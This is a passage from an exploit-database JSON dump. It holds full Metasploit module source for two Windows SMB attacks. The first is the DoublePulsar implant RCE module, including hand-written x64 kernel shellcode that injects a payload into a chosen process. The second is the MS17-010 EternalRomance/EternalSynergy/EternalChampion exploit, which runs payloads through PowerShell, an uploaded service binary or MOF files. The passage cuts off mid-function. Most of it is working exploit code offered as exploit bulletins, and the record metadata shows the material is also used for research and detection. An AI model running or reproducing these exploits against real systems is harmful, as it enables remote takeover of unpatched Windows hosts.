= 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.zdt.ZDTBulletin"]}, {"id": "1337DAY-ID-29702", "hash": "5e42b016f440b4d8256eba859524266c", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Windows SMB MS17-010 EternalRomance / EternalSynergy / EternalChampion Remote Code Executi", "description": "This Metasploit module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.", "published": "2018-02-03T00:00:00", "modified": "2018-02-03T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/29702", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2018-03-01T23:39:17", "history": [], "viewCount": 81, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2018-03-01T23:39:17", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96703", "SMNTC-96709"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147", "MS:CVE-2017-0146"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}], "modified": "2018-03-01T23:39:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/29702", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# Windows XP systems that are not part of a domain default to treating all\r\n# network logons as if they were Guest. This prevents SMB relay attacks from\r\n# gaining administrative access to these systems. This setting can be found\r\n# under:\r\n#\r\n# Local Security Settings >\r\n# Local Policies >\r\n# Security Options >\r\n# Network Access: Sharing and security model for local accounts\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::WbemExec\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\r\n 'Description' => %q{\r\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\r\n primitive. This will then be used to overwrite the connection session information with as an\r\n Administrator session. From there, the normal psexec payload code execution is done.\r\n\r\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\r\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\r\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\r\n named pipe.\r\n },\r\n 'Author' =>\r\n [\r\n 'sleepya', # zzz_exploit idea and offsets\r\n 'zerosum0x0',\r\n 'Shadow Brokers',\r\n 'Equation Group'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10,\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'References' =>\r\n [\r\n [ 'AKA', 'ETERNALSYNERGY' ],\r\n [ 'AKA', 'ETERNALROMANCE' ],\r\n [ 'AKA', 'ETERNALCHAMPION' ],\r\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\r\n [ 'MSB', 'MS17-010' ],\r\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\r\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\r\n [ 'CVE', '2017-0147'], # for EternalRomance reference\r\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\r\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\r\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 3072,\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n [ 'PowerShell', { } ],\r\n [ 'Native upload', { } ],\r\n [ 'MOF upload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 14 2017'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\r\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\r\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\r\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\r\n ])\r\n end\r\n\r\n def exploit\r\n begin\r\n eternal_pwn(datastore['RHOST'])\r\n smb_pwn()\r\n\r\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\r\n print_error(\"#{e.message}\")\r\n rescue ::Errno::ECONNRESET,\r\n ::Rex::Proto::SMB::Exceptions::LoginError,\r\n ::Rex::HostUnreachable,\r\n ::Rex::ConnectionTimeout,\r\n ::Rex::ConnectionRefused => e\r\n print_error(\"#{e.class}: #{e.message}\")\r\n rescue => error\r\n print_error(error.class.to_s)\r\n print_error(error.message)\r\n print_error(error.backtrace.join(\"\\n\"))\r\n ensure\r\n eternal_cleanup() # restore session\r\n end\r\n end\r\n\r\n def smb_pwn()\r\n case target.name\r\n when 'Automatic'\r\n if powershell_installed?\r\n print_status('Selecting PowerShell target')\r\n powershell\r\n else\r\n print_status('Selecting native target')\r\n native_upload\r\n end\r\n when 'PowerShell'\r\n powershell\r\n when 'Native upload'\r\n native_upload\r\n when 'MOF upload'\r\n mof_upload\r\n end\r\n\r\n handler\r\n end\r\n\r\n\r\n # TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to\r\n # be moved into a mixin\r\n\r\n def powershell_installed?\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\#{datastore['SHARE']}\"\r\n\r\n case datastore['SHARE'].upcase\r\n when 'ADMIN$'\r\n path = 'System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n when 'C$'\r\n path = 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n else\r\n path = datastore['PSH_PATH']\r\n end\r\n\r\n simple.connect(share)\r\n\r\n vprint_status(\"Checking for #{path}\")\r\n\r\n if smb_file_exist?(path)\r\n vprint_status('PowerShell found')\r\n psh = true\r\n else\r\n vprint_status('PowerShell not found')\r\n psh = false\r\n end\r\n\r\n simple.disconnect(share)\r\n\r\n psh\r\n end\r\n\r\n def powershell\r\n ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']\r\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n\r\n if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']\r\n print_warning(\"You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option\")\r\n end\r\n\r\n # Execute the powershell command\r\n print_status(\"Executing the payload...\")\r\n begin\r\n psexec(command)\r\n rescue StandardError => exec_command_error\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to execute specified command: #{exec_command_error}\")\r\n end\r\n end\r\n\r\n def native_upload\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)\r\n serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''\r\n\r\n # Upload the shellcode to a file\r\n print_status(\"Uploading payload...\")\r\n smbshare = datastore['SHARE']\r\n fileprefix = \"\"\r\n # if SHARE = Users/sasha/ or something like this\r\n if smbshare =~ /.[\\\\\\/]/\r\n subfolder = true\r\n smbshare = datastore['SHARE'].dup\r\n smbshare = smbshare.gsub(/^[\\\\\\/]/,\"\")\r\n folder_list = smbshare.split(/[\\\\\\/]/)\r\n smbshare = folder_list[0]\r\n fileprefix = folder_list[1..-1].map {|a| a + \"\\\\\"}.join.gsub(/\\\\$/,\"\") if folder_list.length > 1\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#{fileprefix}\\\\#{filename}\", 'rwct')\r\n else\r\n subfolder = false\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#{filename}\", 'rwct')\r\n end\r\n exe = ''\r\n opts = { :servicename => servicename, :serviceencoder => serviceencoder}\r\n begin\r\n exe = generate_payload_exe_service(opts)\r\n\r\n fd << exe\r\n ensure\r\n fd.close\r\n end\r\n\r\n if subfolder\r\n print_status(\"Created \\\\#{fileprefix}\\\\#{filename}...\")\r\n else\r\n print_status(\"Created \\\\#{filename}...\")\r\n end\r\n\r\n # Disconnect from the share\r\n simple.disconnect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n\r\n # define the file location\r\n if datastore['SHARE'] == 'ADMIN$'\r\n file_location = \"%SYSTEMROOT%\\\\#{filename}\"\r\n elsif datastore['SHARE'] =~ /^[a-zA-Z]\\$$/\r\n file_location = datastore['SHARE'].slice(0,1) + \":\\\\#{filename}\"\r\n else\r\n file_location = \"\\\\\\\\127.0.0.1\\\\#{smbshare}\\\\#{fileprefix}\\\\#{filename}\"\r\n end\r\n\r\n psexec(file_location, false)\r\n\r\n unless datastore['SERVICE_PERSIST']\r\n print_status(\"Deleting \\\\#{filename}...\")\r\n #This is not really useful but will prevent double \\\\ on the wire :)\r\n if datastore['SHARE'] =~ /.[\\\\\\/]/\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#{fileprefix}\\\\#{filename}\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#{fileprefix}\\\\#{filename} failed: #{e.message}\")\r\n end\r\n else\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#{filename}\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#{filename} failed: #{e.message}\")\r\n end\r\n end\r\n end\r\n end\r\n\r\n def mof_upload\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\ADMIN$\"\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n\r\n # payload as exe\r\n print_status(\"Trying wbemexec...\")\r\n print_status(\"Uploading Payload...\")\r\n if datastore['SHARE'] != 'ADMIN$'\r\n print_error('Wbem will only work with ADMIN$ share')\r\n return\r\n end\r\n simple.connect(share)\r\n exe = generate_payload_exe\r\n fd = smb_open(\"\\\\system32\\\\#{filename}\", 'rwct')\r\n fd << exe\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\#{filename}\")\r\n\r\n # mof to cause execution of above\r\n mofname = rand_text_alphanumeric(14) + \".MOF\"\r\n mof = generate_mof(mofname, filename)\r\n print_status(\"Uploading MOF...\")\r\n fd = smb_open(\"\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\", 'rwct')\r\n fd << 